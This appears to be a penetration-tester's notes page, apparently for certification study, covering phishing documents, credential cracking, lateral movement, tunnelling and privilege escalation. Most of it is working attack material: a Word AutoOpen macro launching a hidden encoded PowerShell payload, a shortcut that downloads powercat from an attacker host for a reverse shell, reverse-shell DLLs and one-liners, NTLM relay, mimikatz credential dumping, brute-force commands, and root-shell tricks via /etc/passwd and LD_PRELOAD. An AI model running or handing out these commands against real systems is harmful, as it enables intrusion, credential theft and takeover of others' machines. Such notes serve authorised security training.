Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() Dim Str As String Str = Str + "powershell.exe -nop -w hidden -e H4sIAAb/EF0CA7VWa" Str = Str + "2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4H" Str = Str + "C4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj" Str = Str + "4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcOjpbX1+0" Str = Str + "8TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNi" ... Str = Str + "aNrT16pQqhMQu61/7ZgO989DRWIMdw/Di/NWRyD0Jit8bW7V0f" Str = Str + "T2HIOHYs1NZ76MooKEk7y5kGfqUvGvJkOWvJ9aOk0LYm5JYnzt" Str = Str + "AUxkne+Miuwtq9HL2vyJW3j8hvLx/Q+z72j/s/hKKslRm/GL9x" Str = Str + "4XfwvR3U586mIKgDRcoQYdG/joCJT2efexAVaD2fvmwT9XbnJ4" Str = Str + "N4BPo5PhvyjwHqBILAAA=" CreateObject("Wscript.Shell").Run Str End Sub
- Open the document in Word, go in
View
>Macros
and create a macro with the code generated in the previous step- Select the current document in
Macros in:
- Select the current document in
Object Linking and Embedding: another option is to abuse Dynamic Data Exchange (DDE) to execute arbitrary applications from within Office documents (patched since December of 2017)
- Create a batch script to run a reverse shell
START powershell.exe -nop -w hidden -e <BASE64>
- Open Microsoft Word > Create a new document > Navigate to the Insert ribbon > Click the Object menu
- Choose "Create from File" tab and select the newly-created batch script
- Change the appearance of the batch file
Evading Protected View: In exactly the same way as Word and Excel, Microsoft Publisher permits embedded objects and ultimately code execution, but it will not enable Protected View for documents that are distributed over the Internet.
Library files consist of three major parts written in XML to specify the parameters for accessing remote locations:
- General library information
- Library properties
- Library locations
- Run a WebDAV share in the attacker machine
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/WebDAV/
- Create the following Windows Library File in a Window machine
config.Library-ms<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://IP</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>
- In a Window machine, create a shortcut ( automatic_configuration.lnk ) with the following as location
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1');powercat -c <IP> -p <PORT> -e powershell"
- Put
config.Library-ms
andautomatic_configuration.lnk
in the WebDAV directory - Start the Python3 web server on port
8000
to servepowercat.ps1
, WsgiDAV for the WebDAV share/home/kali/webdav
, and a Netcat listener on port4444
- Send the library file to the victim and wait for them to execute the shortcut file to get a reverse shell
Tool
- Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking
Process
- Use winPEAS to enumerate non-Windows services:
.\winPEASany.exe quiet servicesinfo
- Enumerate which of these services our user has stop and start access to
.\accesschk.exe /accepteula -uvqc user <service>
- Once it's found wich service is vulnerable to dll hijacking, find the executable's path with
sc qc dllsvc
- Using Process Monitor, add these the filters to find missing dlls.
- Generate a reverse shell DLL named hijackme.dll:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o hijackme.dll
- Run again the vulnerable service:
net stop <service>
andnet start dllsvc
Another example of a dll:
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
switch (dwReason) {
case DLL_PROCESS_ATTACH:
// Perform initialization tasks for the DLL when it is loaded
int i;
i = system ("net user eviladmin Ev!lpass /add");
i = system ("net localgroup administrators eviladmin /add");
break;
case DLL_PROCESS_DETACH:
// Perform cleanup tasks for the DLL when it is unloaded
break;
case DLL_THREAD_ATTACH:
// Perform initialization tasks for each new thread that loads the DLL
break;
case DLL_THREAD_DETACH:
// Perform cleanup tasks for each thread that unloads the DLL
break;
}
return TRUE;
}
x86_64-w64-mingw32-gcc dllh.cpp --shared -o dllh.dll
Resources
The application design is based on a two-tier architecture. In particular, the thick client application installed on the workstation communicates directly with a backend DBMS without the use of an application server.
The best option, from a security perspective, is designing and implementing a three-tier architecture in which the thick client connects with an intermediary layer (an application server), which in turn communicates with the database. A secure channel must be used for all communications, with only secure protocols (such TLS, HTTPS, etc.), and preferebli with Certificate Pinning.
If this is not possible, it is desirable to provide read-only users and read/write users distinct privileges at the DBMS layer. This would stop vertical privilege escalation even if a read-only user were to access the database directly and try to edit the data.
Sensitive data exposure, key leakage, broken authentication, insecure sessions, and spoofing attacks can all be caused by improper application of encryption methods. Some hashing or encryption techniques, such MD5 and RC4, are known to be insecure and are not advised for use.
When dealing with hashing algorithms, the strongest algorithm available should be used (e.g., SHA-512 or at least SHA-256). However, it is always crucial to take into account the precise context in which the hashing algorithm must be used. For instance, it is recommended to utilize contemporary hashing algorithms that have been created especially for securely saving passwords when managing passwords. This indicates that they should be slow (as opposed to fast algorithms like MD5 and SHA-1), and that can be configured by changing the work factor (e.g., PBKDF2 or Bcrypt)
If not configured correctly, the encryption can be not sufficiently secure. An example with AES, an algorithm for symmetric encryption:
- Cipher-Block-Chaining (CBC) is no longer considered safe when verifiable padding has been applied without first ensuring the integrity of the ciphertext, except for very specific circumstances. If implemented, it can weakens AES encryption.
The memory analysis of an application, done when the thick client process is running, can highlight the presence of secrets in cleartext and that can be therefore extracted by any user having access to the machine where the application is hosted.
Resource
- Process Hacker It helps to dump the exe memory and see what sensitive data is there
Sometimes, the thick client application's source code is not obfuscated, therefore a hostile user may decompile it and easily comprehend every functionality of the application. It's also possible that more can be found, like credentials and api keys.
Resources
- VB Decompiler decompile a VB application
- ILSpy | dnSpy .NET decompilers
If an application executable, and/or the imported DLLs, has not been digitally signed, it's possible replace it with a tampered version without the user noticing.
Resource
- Sigcheck check the signature of an executable
Due to the fact that the client does not verify the TLS certificate presented by the back-end, it's possible to intercept also HTTPS communications managed by the thick client application.
Without effective certificate control, an attacker who is capable of conducting a Man in the Middle attack can provide a self-signed certificate and the application will accept it, invalidating the protection provided by the TLS connection.
During the SSL/TLS negotiation, SSL/TLS connections may be set up to offer outdated protocols and cipher suites that are susceptible to known security flaws. The data transmitted between the server and the client could potentially be read or modified in this case if an attacker is able to intercept the communication.
Resource
- testssl.sh useful for checking outdated ciphers & more
If Citrix is present and you have access to it, there are multiple ways you can achieve Remote Code Execution:
- Try to upload a PowerShell
- Search for a functionality that opens a dialog box. Insert the path for
cmd
andPowerShell
and see if they pop-up - In a dialog box, see if the right-click is allowed. Play with the functionality to achieve RCE, like creating a
.bat
and running it or upload files - Upload Process Hacker and see if you find Cleartext secrets in memory
Resources
- If it's found that standard users have direct access to the database, there is the possibility for users to read and write data that is not otherwise accessible through the client application.
- If the SQL server requires a Windows User access, use the command
runas /user:localadmin <SQL-SERVER-MANAGEMENT-STUDIO>
- Try access with the account
sa:RPSsql12345
- Intercept the requests and see if there is an Insecure application design. In that case, it might be possible to perform a Direct database access, SQLi or Remote Code Execution
Resources
Windows service executable might be configured with insecure permissions. Services configured to use an executable with weak permissions are vulnerable to privilege escalation attacks.
Unprivileged users have the ability to change or replace the executable with arbitrary code, which would then be run the following time the service is launched. This can lead to privilege escalation depending on the user the service is running as.
- Check for classic HTML injections and XSS
- Try to use a
SSID
as a vector for an XSS with a payload like"/><img src=x onerror=alert(1)>
- Try to use a
- Check if
<webview>
works. If it does, it's might be possible to achieve a LFI with a payload like this<webview src="file:///etc/passwd"></webview>
. [Reference]
Resources
<# gather information about current user #>
whoami
net user <user>
whoami /priv
<# gather user context information #>
id
<# discover other user accounts on the system #>
net user
<# discover localgroups and users in those groups#>
whoami /groups
net localgroup
net user <username>
PS C:\> Get-LocalGroupMember <group>
<# enumerate the Hostname #>
hostname
<# enumerate the Operating System Version and Architecture #>
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
<# enumerate running processes and services #>
PS C:\> Get-Process
tasklist /SVC
<# enumerate networking information #>
ipconfig /all
route print
netstat -ano
<# enumerate firewall status and rules #>
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
<# enumerate scheduled tasks #>
schtasks /query /fo LIST /v
<# enumerate installed applications and patch levels #>
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn
<# enumerate readable/writable files and directories #>
accesschk.exe -uws "Everyone" "C:\Program Files"
PS C:\> Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
<# enumerate unmounted disks #>
mountvol
<# enumerate device drivers and Kernel modules #>
PS C:\> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
PS C:\> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
<# enumerating binaries that AutoElevate #>
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
<# find interesting files #>
Get-ChildItem -Path <PATH> -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path <PATH> -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path <PATH> -Include *.kdbx,*.txt,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
<# see history of commands #>
Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\Public\Transcripts\transcript01.txt
To use Event Viewer to search for events recorded by Script Block Logging:
- Open the Event Viewer:
- Press Windows key + R to open the Run dialog box.
- Type
eventvwr.msc
and press Enter.
- In the Event Viewer window, expand "Applications and Services Logs"
- Expand the "Microsoft-Windows-PowerShell/Operational" log
- Click on the "Filter Current Log" option on the right-hand side of the window
- In the Filter Current Log dialog box, enter "4104" as the Event ID
- Click on the "OK" button to apply the filter
- The Event Viewer will now display only the events related to Script Block Logging
# enumerate users
cat /etc/passwd
# enumerate the Hostname
hostname
# enumerate the Operating System Version and Architecture
cat /etc/issue
cat /etc/*-release
cat /etc/os-release
uname -a
uname -r
arch
# enumerate running processes and services
ps axu
# enumerate networking information
ip a
/sbin/route
routel
ss -anp
# inspect custom IP tables
cat /etc/iptables/rules.v4
# enumerate scheduled tasks
ls -lah /etc/cron*
cat /etc/crontab
crontab -l
sudo crontab -l
# enumerate installed applications and patch levels
dpkg -l
# find all writable files
find / -writable -type d 2>/dev/null
# find all writable files in /etc
find /etc -maxdepth 1 -writable -type f
# find all readable files in /etc
find /etc -maxdepth 1 -readable -type f
# enumerate readable/writable files and directories
find / -writable -type d 2> /dev/null
# enumerate unmounted disks
cat /etc/fstab
mount
/bin/lsblk
lsblk
# enumerate device drivers and kernel modules
lsmod
/sbin/modinfo libata
# enumerating binaries that AutoElevate
find / -perm -u=s -type f 2>/dev/null
# find SSH private keys
find / -maxdepth 5 -name .ssh -exec grep -rnw {} -e 'PRIVATE' \; 2> /dev/null
- SecLists
- wordlists.assetnote.io
- content_discovery_all.txt
- OneListForAll
- wordlistgen
- Scavenger
- cewl
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Brute Force Wordlists
Crunch, see crunch | Kali Linux Tools.
Placeholder | Character translation |
---|---|
@ | Lower case alpha characters |
, | Upper case alpha characters |
% | Numeric characters |
^ | Special characters including space |
Examples of usage:
- Structure of the passwords of the target:
[Capital Letter] [2 x lower case letters] [2 x special chars] [3 x numeric]
. Runcrunch 8 8 -t ,@@^^%%%
- Passwords between four and six characters in length, containing only the characters 0-9 and A-F:
crunch 4 6 0123456789ABCDEF -o crunch.txt
- Use a pre-defined character-set with
-f
and includemixalpha
to include all lower and upper case letterscrunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt
Mutating wordlists
When password policies are implemented, it is helpful to remove password policies that are guaranteed to fail from the worlist. Starting from a wordlist called demo.txt
sed -i '/^1/d' demo.txt
remove all number sequences
Many people just append a "1" to the end of an existing password when creating a password with a number value. Create a rule file with $1 that adds a "1" to each password in our wordlist.
- Add a rule for hashcat with
echo \$1 > demo.rule
Many people have a tendency to capitalize the initial character in a password when they are required to use an upper case character.
- Add a rule with
echo '$1\nc' > demo.rule
- Note: each line in the file is interpreted as a new rule
For special characters:
$1 c $!
to havePassword1!
$! $1 c
to havePassword!1
Other rules
- Test the rules with
hashcat -r demo.rule --stdout demo.txt
/usr/share/hashcat/rules
in Kali- See: rule_based_attack [hashcat wiki]
Tools
- Note for Linux-based systems: first use the unshadow utility to combine the passwd and shadow files from the compromised system
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john -incremental -users:<user list> <file to crack>
pure brute force attack, you can use-user:<username>
to target a specific userjohn --show crackme
display the passwords recoveredjohn --wordlist=<custom wordlist file> -rules <file to crack>
dictionary attack, use-wordlist
instead of--wordlist=<custom wordlist file>
to use the john default wordlistjohn hash.txt --format=NT
simple attack to attack NT hashesjohn --rules --wordlist=<custom wordlist file> hash.txt --format=NT
using password mutation rulesjohn --rules --wordlist=<custom wordlist file> unshadowed.txt
- To distribute the load and speed up the cracking process (for multi core CPUs)
- Use the options
--fork=8
and--node=1-8/16
on the first machine - Use the options
--fork=8
and--node=9-16/16
on the first machine
- Use the options
- Install the tables
- Load a password file with
Load
- Click on the
Crack
button
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
search for KeePass database fileskeepass2john Database.kdbx > keepass.hash
format KeePass database for Hashcat with keepass2john- remove
Database:
fromkeepass.hash
- remove
hashcat -m 13400 keepass.hash wordlist.txt -r hashcat.rule --force
crack the KeePass database hash- find the mode of KeePass in Hashcat with
hashcat --help | grep -i "KeePass"
- find the mode of KeePass in Hashcat with
- Prerequisites: found username, old passwords (or common passwords), password policy and private key
id_rsa
chmod 600 id_rsa
to change the permissionsid_rsa
needs a password
ssh2john id_rsa > ssh.hash
> removeid_rsa:
- For JtR, create a file for the rules in the file
ssh.rule
using the found password policy- add
[List.Rules:sshRules]
as the first line of the file - add the rules to JtR config
sudo sh -c 'cat /home/kali/Downloads/ssh.rule >> /etc/john/john.conf'
- add
john --wordlist=ssh.passwords --rules=sshRules ssh.hash
- Connect to the ssh service with
ssh -i id_rsa -p <PORT> <user>@<IP>
and insert the found password
Tools
- SSH Brute force:
scanner/ssh/ssh_login
medusa -d
All the protocols medusa can interact withmedusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
-m
htaccess-protected URL-h
target host-u
attack the admin user-P
wordlist file-M
HTTP authentication scheme
crowbar --help
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1
-b
specify the protocol-s
target server-u
username-c
wordlist-n
number of threads
sudo hydra
sudo hydra -L users.txt -P pass.txt <service://server> <options>
launch a dictionary attackhydra -L users.txt -P pass.txt telnet://target.server
Telnet examplehydra -L users.txt -P pass.txt http-get://target.server
Password protected web resource- Specify a port with
-s <PORT>
in
SSH Attack
sudo hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1
-l
specify the target username-P
specify a wordlistprotocol://IP
o specify the target protocol and IP address respectively
HTTP POST Attack
sudo hydra http-form-post -U
sudo hydra -l user -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
-l
user name-P
wordlist-vV
verbose output-f
stop the attack when the first successful result is found- supply the service module name
http-form-post
and its required arguments/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN
Tools
- Sample password hash encoding strings
- hashID
- hash-identifier
- mimikatz
- fgdump
- Credential Editor
- pth-winexe
- Responder.py
Notes
- On most Linux systems, hashed passwords are stored in the
/etc/shadow
file - On Windows systems, hashed user passwords are stored in the Security Accounts Manager (SAM). Microsoft introduced the SYSKEY feature (Windows NT 4.0 SP3) to deter offline SAM database password attacks
- Windows NT-based systems, up to and including Windows 2003, store two different password hashes: LAN Manager (LM) (DES based) and NT LAN Manager (NTLM), wich uses MD4 hashing
- From Windows Vista on, the operating system disables LM by default and uses NTLM
- In Windows, get all local users in PowerShell with
Get-LocalUser
- hash-identifier
- hashid
hashid <HASH>
- Hash Analyzer - TunnelsUP
C:\Programs\mimikatz.exe
privilege::debug
enables the SeDebugPrivilge access right required to tamper with another processtoken::elevate
elevate the security token from high integrity (administrator) to SYSTEM integritylsadump::sam
dump the contents of the SAM database
- Identify the local users with
Get-LocalUser
- Run
mimikatz.exe
as an administrator - Use the command
privilege::debug
to haveSeDebugPrivilege
access right enabled - Use the command
token::elevate
to elevate to SYSTEM user privileges - Extract passwords from the system
sekurlsa::logonpasswords
attempts to extract plaintext passwords and password hashes from all available sourceslsadump::sam
extracts the NTLM hashes from the SAM
- Run
hashcat --help | grep -i "ntlm"
to retrieve the correct hash mode hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Capture a Net-NTLMv2 hash
ip a
retrieve a list of all interfacessudo responder -I <interface>
- Wait for a connection, capture the hash and save it as
user.hash
Crack the Net-NTLMv2 hash
hashcat --help | grep -i "ntlm"
hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt --force
Relaying Net-NTLMv2
- Instead of printing a retrieved Net-NTLMv2 hash, we'll forward it to
<IP>
that it's the target machine sudo impacket-ntlmrelayx --no-http-server -smb2support -t <IP> -c "powershell -enc <BASE64>"
- use it to execute a reverse shell on your machine on port
<PORT>
and run a listenernc -nvlp <PORT>
- see how to encode one-liner in base64 here
- use it to execute a reverse shell on your machine on port
- Now, if a user tries to connect to our machine with
dir \\<ATTACKER-IP>\test
, it will forward the request to<IP>
and execute the command specified in the flag-c
Note: this attack works for Administrator
user (except for certain conditions). Since Windows Vista, all Windows versions have UAC remote restrictions enabled by default.
- From Mimikatz, run
privilege::debug
,token::elevate
andlsadump::sam
to obtain the NTLM hash of Administrator - Gain access to a SMB share with
smbclient \\\\<IP>\\<SMB-SHARE> -U Administrator --pw-nt-hash <Administrator-HASH>
- Gain an interactive shell with
impacket-psexec -hashes <LMHash>:<NTHash> <username>@<ip> <command>
- This will always give a shell as
SYSTEM
, useimpacket-wmiexec
to obtain a shell as the user used for authentication <command>
is optional. If left blank, cmd.exe will be executed- See also: impacket-scripts
- This will always give a shell as
Other notes:
- "Pass the Hash Attack"
- "PsExec Explainer by Mark Russinovich"
- pth-winexe
pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe
-U
specifying the username and hash, along with the SMB share and the name of the command to execute
Tools
- Edit
/etc/rinetd.conf
, add0.0.0.0 <Local-PORT> <IP> <DEST-PORT>
- This means that all traffic received on port
<Local-PORT>
of our machine, listening on all interfaces (0.0.0.0
), regardless of destination address, will be forwarded to<IP>:<DEST-PORT>
.
- This means that all traffic received on port
- Restart rinetd
sudo service rinetd restart
and confirm that the port is bound withss -antp | grep "80"
socat -ddd TCP-LISTEN:<PORT>,fork TCP:<DEST-IP>:<DEST-PORT>
- The traffic received on port
<PORT>
will be forwarded to<DEST-IP>:<DEST-PORT>
- The traffic received on port
- Example with SSH
socat TCP-LISTEN:2222,fork TCP:<IP>:22
- Example with psql -h 192.168.50.63 -p 2345 -U postgres
socat -ddd TCP-LISTEN:2345,fork TCP:<IP>:5432
See: "SSH Tunneling: Examples, Command, Server Config"
- Give a reverse shell TTY functionality with Python3's pty:
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -R <local-port>:127.0.0.1:<target-port> <username>@<local-machine>
ssh -N -L <bind_address>:<port>:<host>:<hostport> <username>@<address>
- Listen on all interfaces (
<bind_address>
=0.0.0.0
) on port<port>
, then forward all packets through the SSH tunnel (<username>@<address>
) to port<hostport>
on the host<host>
- Verify it with
ss -ntplu
- Listen on all interfaces (
- From the reverse shell, run
ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>
- Now we must direct our tools to use this proxy with ProxyChains
- Edit the ProxyChains configuration file
/etc/proxychains.conf
, add the SOCKS5 proxysocks5 <IP-reverse-shell> <port to bind to>
- Edit the ProxyChains configuration file
- To run the tools through the SOCKS5 proxy, prepend each command with ProxyChains
- Example with nmap:
sudo proxychains nmap -vvv -sT --top-ports=20 -Pn <IP>
- Example with SMB:
proxychains smbclient -L //<IP>/ -U <username> --password=<password>
- Example with nmap:
- Start ssh on your local machine
- On the reverse shell:
ssh -N -R [bind_address]:port:host:hostport [username@address]
- Set
[bind_address]
as127.0.0.1
[username@address]
of your local ssh
- Set
- On the reverse shell, run
python3 -c 'import pty; pty.spawn("/bin/bash")'
andssh -N -R <PORT> [username@address]
[username@address]
of your local ssh
- Edit the ProxyChains configuration file
/etc/proxychains.conf
, add the SOCKS5 proxysocks5 127.0.0.1 <PORT>
- To run the tools through the SOCKS5 proxy, prepend each command with ProxyChains
- Note: it requires root privileges on the SSH client and Python3 on the SSH server
- From the reverse shell, run
socat TCP-LISTEN:2222,fork TCP:<forward-IP>:<forward-PORT>
sshuttle -r <ssh-connection-string> <subnet> ...
- Specify the SSH connection string we want to use
<ssh-connection-string>
and the subnets that we want to tunnel through this connection (ex.10.74.23.0/24 172.16.163.0/24
)
- Specify the SSH connection string we want to use
- Start SSH server on Kali
sudo systemctl start ssh
- Connect to the Windows machine. Note: OpenSSH bundled with Windows has to be higher than
7.6
for remote dynamic port forwarding ssh -N -R <PORT> <kali>@<IP>
- Edit the ProxyChains configuration file
/etc/proxychains.conf
, add the SOCKS5 proxy to it (socks5 127.0.0.1 <PORT>
). - To run the tools through the SOCKS5 proxy, prepend each command with ProxyChains
The general format is: plink.exe <user>@<kali-IP> -R <kaliport>:<target-IP>:<target-port>
The first time plink connects to a host, it will attempt to cache the host key in the registry. For this reason, we should pipe the answer to the prompt with the cmd.exe /c echo y
command. The final result will look like cmd.exe /c echo y | plink.exe <user>@<kali> -R <kaliport>:<target-IP>:<target-port>
.
netsh interface portproxy add v4tov4 listenport=<PORT> listenaddress=<IP> connectport=<forward-PORT> connectaddress=<forward-IP>
- use netsh (
interface
) context toadd
an IPv4-to-IPv4 (v4tov4
) proxy (portproxy
) - listening on
<target-IP>
(listenaddress=target-IP
), port<target-port>
(listenport=<target-port>
) - that will forward to
<forward-IP>
(connectaddress=<forward-IP>
), port<forward-port>
(connectport=<forward-port>
)
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<IP> localport=<port> action=allow
- The machines are
KALI01
,DMZ01
andINTERNAL01
KALI01
will listen on TCP port1080
, a SOCKS proxy port
- In
KALI01
, copy the Chisel binary to the Apache2 server foldersudo cp $(which chisel) /var/www/html/
and start Apache2sudo systemctl start apache2
- Deliver the Chisel executable to the
DMZ
- On
KALI01
, run Chiselchisel server --port 8080 --reverse
and runsudo tcpdump -nvvvXi <INTERFACE> tcp port 8080
ip a
retrieve the list of all interfaces
- On
DMZ01
, run the Chisel client command/tmp/chisel client <KALI01-IP>:8080 R:socks > /dev/null 2>&1 &
- Now, you should be able to see inbound Chisel traffic and an incoming connection in the Chisel server
- Check if the SOCKS port has been opened by the
KALI01
Chisel server withss -ntplu
- How to use the HTTP Tunnel
- SSH with Ncat: Pass an Ncat command to ProxyCommand to use the socks5 protocol and the proxy socket at
127.0.0.1:1080
to connect toINTERNAL01
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' <username>@<IP>
%h
and%p
tokens represent the SSH command host and port values
- Another option is to use ProxyChains by adding
socks5 127.0.0.1 1080
to/etc/proxychains.conf
and prependingsudo proxychains
to each command we want to run
- SSH with Ncat: Pass an Ncat command to ProxyCommand to use the socks5 protocol and the proxy socket at
- Setup:
WAN
,DMZ
andINTERNAL
- From a machine inside
WAN
, setup a DNS server by using a software like Dnsmasqsudo dnsmasq -C dnsmasq.conf -d
. An example of configuration (see also dnsmasq.conf.example):# Do not read /etc/resolv.conf or /etc/hosts no-resolv no-hosts # Define the zone auth-zone=organization.corp auth-server=organization.corp # TXT record txt-record=www.organization.corp,some info. txt-record=www.organization.corp,some other info.
sudo tcpdump -i ens192 udp port 53
- Setup:
WAN
,DMZ
andINTERNAL
- Start
dnscat2-server organization.corp
fromWAN
and connect fromINTERNAL
to it with./dnscat feline.corp
- From
dnscat2-server
>window -i 1
>listen 127.0.0.1:<lister-PORT> <IP>:<PORT>
<IP>:<PORT>
= machine fromINTERNAL
- TryHackMe | Linux PrivEsc
- Linux Privilege Escalation for OSCP & Beyond! | Udemy
- "Understanding and Using File Permissions | Ubuntu"
- "File permissions and attributes | Arch Linux"
- Basic Linux Privilege Escalation
- Tools
- Linux Exploit Suggester 2
- LinPEAS - Linux Privilege Escalation Awesome Script
- Unix-privesc-check
./unix-privesc-check standard > output.txt
- linux-smart-enumeration
- LinEnum
- Reverse Shell Generator - rsg
- Check your user with
id
andwhoami
- Run linux-smart-enumeration with increasing levels
- starting from lvl
0
to2
,./lse.sh -l 0
- starting from lvl
- Run other scripts
- If the scripts fail, run the commands in this section and see Basic Linux Privilege Escalation
PHP
php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
Python
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Bash
#!/bin/bash
/usr/bin/bash -i >& /dev/tcp/192.168.45.226/445 0>&1
More shells
- Reverse Shell Cheat Sheet
- Reverse Shell Generator
- Upgrade a Dumb Shell to a Fully Interactive Shell for More Flexibility
python -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null
ps aux | grep "^root"
Show all process running as root- Identify the program version with
<program> --version
or<program> -v
- On Debian like systems, run
dpkg -l | grep <program>
- On systems that use rpm, run
rpm –qa | grep <program>
- On Debian like systems, run
MySQL service running as root with no password assigned
- Run
mysqld --version
- One great exploit is the following: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.
- Once the UDF is installed, run the following command in the MySQL shell:
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash');
- Run
/tmp/rootbash
for a root shell:/tmp/rootbash -p
- Once the UDF is installed, run the following command in the MySQL shell:
Readable /etc/shadow
- Check if
/etc/shadow
is readable withls -l /etc/shadow
- Run
cat /etc/shadow > hash.txt john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Writable /etc/shadow
- Check if
/etc/shadow
is writable withls -l /etc/shadow
- Generate a new password hash with
mkpasswd -m sha-512 newpass
- Substitute the root password hash with the new hash with
nano /etc/shadow
Writable /etc/passwd
- Check if
/etc/passwd
is writable withls -l /etc/passwd
- Generate a new password hash with
openssl passwd newpass
- Substitute the root password hash with the new hash with
nano /etc/passwd
- or add a new root user to
/etc/passwd
withecho 'root2:<password hash>:0:0:root:/root:/bin/bash' >> /etc/passwd
- test the new user with
su root2
andid
- test the new user with
- or add a new root user to
env
inspect environment variablescat .bashr
ispect .bashrcwatch -n 1 "ps -aux | grep pass"
harvest active processes for credentialssudo tcpdump -i lo -A | grep "pass"
perform password sniffing
Classic method
- Try to run
sudo su
- If
su
doesn't work, try with the followingssudo -s
sudo -i
sudo /bin/bash
sudo passwd
Shell Escape Sequences
sudo -l
list the programs which sudo allows your user to run- See GTFOBins and search for the program names
apt-get privilege escalation
- apt get | GTFOBins
sudo apt-get changelog apt !/bin/sh
Environment Variables
sudo -l
check which environment variables are inherited, look for theenv_keep
optionsLD_PRELOAD
loads a shared object before any others when a program is runLD_LIBRARY_PATH
provides a list of directories where shared libraries are searched for first
- First solution
- Create a shared object with
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
, use the code below#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setresuid(0,0,0); system("/bin/bash -p"); }
sudo LD_PRELOAD=/tmp/preload.so <program name>
Run one of the programs you are allowed to run via sudo while setting theLD_PRELOAD
environment variable to the full path of the new shared object
- Create a shared object with
- Second solution, with
apache
- See which shared libraries are used by apache
ldd /usr/sbin/apache2
- Create a shared object with the same name as one of the listed libraries,
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /tmp/library_path.c
-
#include <stdio.h> #include <stdlib.h> static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); }
- Run
apache2
using sudo, while settings theLD_LIBRARY_PATH
environment variable to/tmp
, where the output of the compiled shared object is
- See which shared libraries are used by apache
File Permissions
- View the contents of the system-wide crontab
cat /etc/crontab
, the cron log filegrep "CRON" /var/log/syslog
and see cron jobs, locate the file run withlocate <program>
and see the permissions withls -l <program full path>
- If one of them is world-writable, substitute it with the following
#!/bin/bash bash -i >& /dev/tcp/<Your-IP>/4444 0>&1
- You can also try with
